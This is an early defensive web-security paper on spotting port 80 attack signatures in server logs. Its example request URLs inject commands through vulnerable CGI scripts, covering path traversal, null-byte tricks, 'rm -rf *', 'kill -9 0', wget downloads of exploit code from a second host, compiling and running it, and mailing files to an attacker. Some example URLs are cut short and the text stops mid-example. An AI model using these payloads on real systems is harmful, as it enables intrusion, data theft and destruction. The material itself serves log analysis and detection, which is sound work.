Author: Zenomorph admin@cgisecurity.com "Fingerprinting Port 80 Attacks: A look into web server, and web application attack signatures." I. Introduction II. Common Fingerprints III. Advanced Fingerprints IV. Overflows V. Hex Encoding VI. Conclusion I. Introduction: Port 80 is the standard port for websites, and it can have a lot of different security issues. These holes can allow an attacker to gain either administrative access to the website, or even the web server itself. This paper looks at some of the signatures that are used in these attacks, and what to look for in your logs. II. Common Fingerprints: This section has examples of common fingerprints used in exploitation of both web applications, and web servers. This section is not supposed to show you every possible fingerprint, but instead show you the majority of what exploits and attacks will look like. These signatures should pick up most of the known and unknown holes an attacker may use against you. This section also describes what each signature is used for, or how it may be used in an attack. "." ".." and "..." Requests These are the most common attack signatures in both web application exploitation and web server exploitation. It is used to allow an attacker or worm to change directories within your web server to gain access to sections that may not be public. Most CGI holes will contain some ".." requests. Below is an example. * http://host/cgi-bin/lame.cgi?file=../../../../etc/motd This shows an attacker requesting your web servers "Message Of The Day" file. If an attacker has the ability to browse outside your web servers root, then it may be possible to gather enough information to gain further privileges. "%20" Requests This is the hex value of a blank space. While this doesn't mean youre being exploited, it is something you may want to look for in your logs. Some web applications you run may use these characters in valid requests, so check your logs carefully. On the other hand, this request is occasionally used to help execute commands. Below is an example. * http://host/cgi-bin/lame.cgi?page=ls%20-al| (Otherwise known as ls -al common on a Unix system) The example shows an attacker executing the ls command on Unix and feeding it arguments. The argument shown reveals an attacker requesting a full directory listing. This can allow an attacker access to important files on your system, and may help give him an idea as how to gain further privileges. "%00" Requests This is the hex value of a null byte. It can be used to fool a web application into thinking a different file type has been requested. Below is an example. * http://host/cgi-bin/lame.cgi?page=index.html The example shown may be a valid request on this machine. If an attacker see's such behavior he will certainly probe this application to find a hole in it. * http://host/cgi-bin/lame.cgi?page=../../../../etc/motd A web application may disallow this request because its checking for the filename to end in .htm , .html, .shtml, or other file types. A lot of the time the application tells you that this isn't a valid file type for this application. Often times it will tell an attacker that the file must end in a certain filename. From here an attacker can gather server paths, filenames and then possibly gather more information about your system. * http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html This request tricks the application into thinking the filename ends in one of its predefined acceptable file types. Some web applications do a poor job of checking for valid file requests and this is a common method used by attackers. "|" Requests This is a pipe character, which is often used in Unix to help execute multiple commands at a time in a single request. Example: #cat access_log| grep -i "/../" (This shows checking in logs of .. requests which are often used by attackers and worms.) Often times valid web applications will use this character and it may cause false alarms in your IDS logs. A careful examination of your software and its behavior is a good idea so that your false alarm rates will go down. Below are a few examples. * http://host/cgi-bin/lame.cgi?page=../../../../bin/ls| This request is asking for the common of ls to be executed. Below is another variation of this request type. * http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc| This request is asking for full directory listing of the "etc" directory on a Unix system. * http://host/cgi-bin/lame.cgi?page=cat%20access_log|grep%20-i%20"lame" This request is asking for the command of "cat" to be executed and then the command of "grep" with an argument of -i. ";" Requests This is the character that allows multiple commands to be executed in a row on a Unix system. Example: #id;uname -a (This is executing the "id" command followed by the "uname" command) Often times web applications will use this character and it may be possible to cause false alarms in your IDS logs. Once again a careful examination of your software and its behavior is a good idea so that your false alarm rates will go down. "<" and ">" Requests These characters are to be checked in logs for numerous reasons, the first being that these characters are used to append data to files. Example 1: #echo "your hax0red h0 h0" >> /etc/motd (This shows a request to write the information into this file.) An attacker may simply use a request like this to deface your website. The famous RDS exploit by rain.forest.puppy was often used by attackers to echo information into the websites main page. Check attrition.org and search for hacked websites with plain white pages with no formatting for an example. Example 2: http://host/something.php=Hi%20mom%20I'm%20Bold! This request shows a cross site server scripting attack example. You will notice the html tags use the "<" and ">" characters. While this type of attack won't grant an attacker system access, it could be used to fool people into thinking that certain information on a website is valid. (Of course they would need to visit the link the attacker wants them to. The request may be masked by encoding the characters in hex so as not to be so obvious.) "!" Requests This character is often used in SSI(Server Side Include) attacks. These attacks may allow an attacker to have similar results as cross site scripting exploitation does if the attacker fools a user into clicking on a link. Below is an example. http://host1/something.php= This is an example of what an attacker may do. This is basically including a file from host2 and making it appear to be coming from host1. (Of course they would need to visit the link the attacker wants them to. The request may be masked by encoding the characters in hex so as not to be so obvious) It also may allow him to execute commands on your system with the privileges of your web server user. Below is an example. http://host/something.php= This is executing the command of "id" on the remote system. This is going to show the user id of the web server which is usually user "nobody" or "www". It may also allow the inclusion of hidden files. Below is an example. http://host/something.php= This is including the .htpasswd file. This file isn't normally allowed to be viewed by the world, and apache even has a built in rule to deny requests to .ht. The SSI tag bypasses this and can cause security problems. " On a poorly written php application it may execute this command locally on the remote host under the privilege of the web server user. An addition to this chapter is that an attacker may encode these requested with hex. Check for anything out of the ordinary and research anything suspicious. "`" Requests The backtick character is often used in perl to execute commands. This character isn't normally used in any valid web application, so if you see it in your logs take it very seriously. Below is an example. http://host/something.cgi=`id` On a poorly written web application written in perl this would execute the "id" command. III. Advanced Signatures: This section focuses more on the commands an attacker executes, along with files which may be requested, and how to detect if youre vulnerable to remote command execution. While this isn't a complete list of commands or files an attacker may request it will give you a good idea of what is happening, or being attempted against your system. * Common commands an attacker or worm may execute. "/bin/ls" This is the binary of the ls command. It is often requested in full paths for a lot of common web application holes. If you see this request anywhere in your logs its a good chance your system is effected by remote command execution holes. This isn't always a problem and could be a false alarm. Once again a study of your web application is essential. If possible, test the same request that showed up in your logs and check the output for any possible execution. Example: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al| Example: http://host/cgi-bin/bad.cgi?doh=ls%20-al; "cmd.exe" This is the windows shell. An attacker if he has access to run this script will pretty much be able to do anything on a windows machine depending on server permissions. Most internet worms involving port80 use cmd.exe to help spread infection of themselves to other remote systems. http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:\ "/bin/id" This is the binary of the id command. his is often requested in full paths for a lot of common web application holes. If you see this request anywhere in your logs theres a good chance your system is effected by remote command execution holes. This isn't always a problem and could be a false alarm. This command shows you what user you are along with information on which groups you belong to. If possible test the same request that showed up in your logs and check the output for any possible execution. Example: http://host/cgi-bin/bad.cgi?doh=../../../../bin/id| Example: http://host/cgi-bin/bad.cgi?doh=id; "/bin/rm" This is the binary of the rm command. This is often requested in full paths for a lot of common web application holes. If you see this request anywhere in your logs theres a good chance your system is affected by remote command execution holes. This isn't always a problem and could be a false alarm. This command, on the other hand, allows deletion of files and is very dangerous if either used improperly, or by an attacker. If possible, test the same request that showed up in your logs and check the output for any possible execution. If its requesting an important filename, you may want to use judgment before doing this. If its deleting the file name stupid.txt, and it doesn't appear to exist within the website it was requested from, create the file and test it. Example: http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*| Example: http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*; "wget and tftp" commands These commands are often used by attackers and worms to download additional files, which may be used in gaining further system privileges. wget is a Unix command which may be used to download a backdoor. tftp is a Unix and NT command which is used to download files with. Some IIS worms used this tftp command to download a copy of themselves to an infected host to keep spreading itself. Example: http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2/Phantasmp.c| Example: http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/Phantasmp.c; "cat" command This command is often used to view contents of files. This could be used to read important information such as configuration files, password files, credit card files, and anything else you can think of. Example: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd| Example: http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd; "echo" command This command is often used to append data to files such as index.html. Example: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt| Example: http://host/cgi-bin/bad.cgi?doh=echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt; "ps" command This command shows a listing of running processes. It can tell an attacker if the remote host is running any security software, and also give them ideas as to other security holes this host may have. Example: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux| Example: http://host/cgi-bin/bad.cgi?doh=ps%20-aux; "kill and killall" commands These commands are used to kill processes on a Unix system. An attacker may use these to stop a system service or program. An attacker may also use this command to help cover his tracks if an exploit he used forked a lot of child processes or crashed abnormally. Example: http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200| Example: http://host/cgi-bin/bad.cgi?doh=kill%20-9%200; "uname" command This command is often used to tell an attacker the hostname of the remote system. Often times a website is hosted on a ISP and this command can get an idea of which ISP he may have access to. Usually uname -a is requested and it may appear in logs as "uname%20-a". Example: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a| Example: http://host/cgi-bin/bad.cgi?doh=uname%20-a; "cc, gcc, perl, python, etc..." Compilers/Interpreter commands The "cc" and "gcc" commands allow compilation of programs. An attacker may use wget, or tftp to download files, and then use these compilers to compile the exploit. From here anything is possible, including local system exploitation. Example: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c| Example: http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337; If you see a request for "perl" or "python" it may be possible the attacker downloaded a remote perl or python script, and is trying to locally exploit your system. "mail" command This command may be used by an attacker to email files to an email address the attacker owns. It may also be used to spam from, and spamming in this manner may not be very easy to detect. Example: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@hostname%20<<%20/etc/motd| Example: http://host/cgi-bin/bad.cgi?doh=mail%20steele@jersey.whitehouse.gov%20<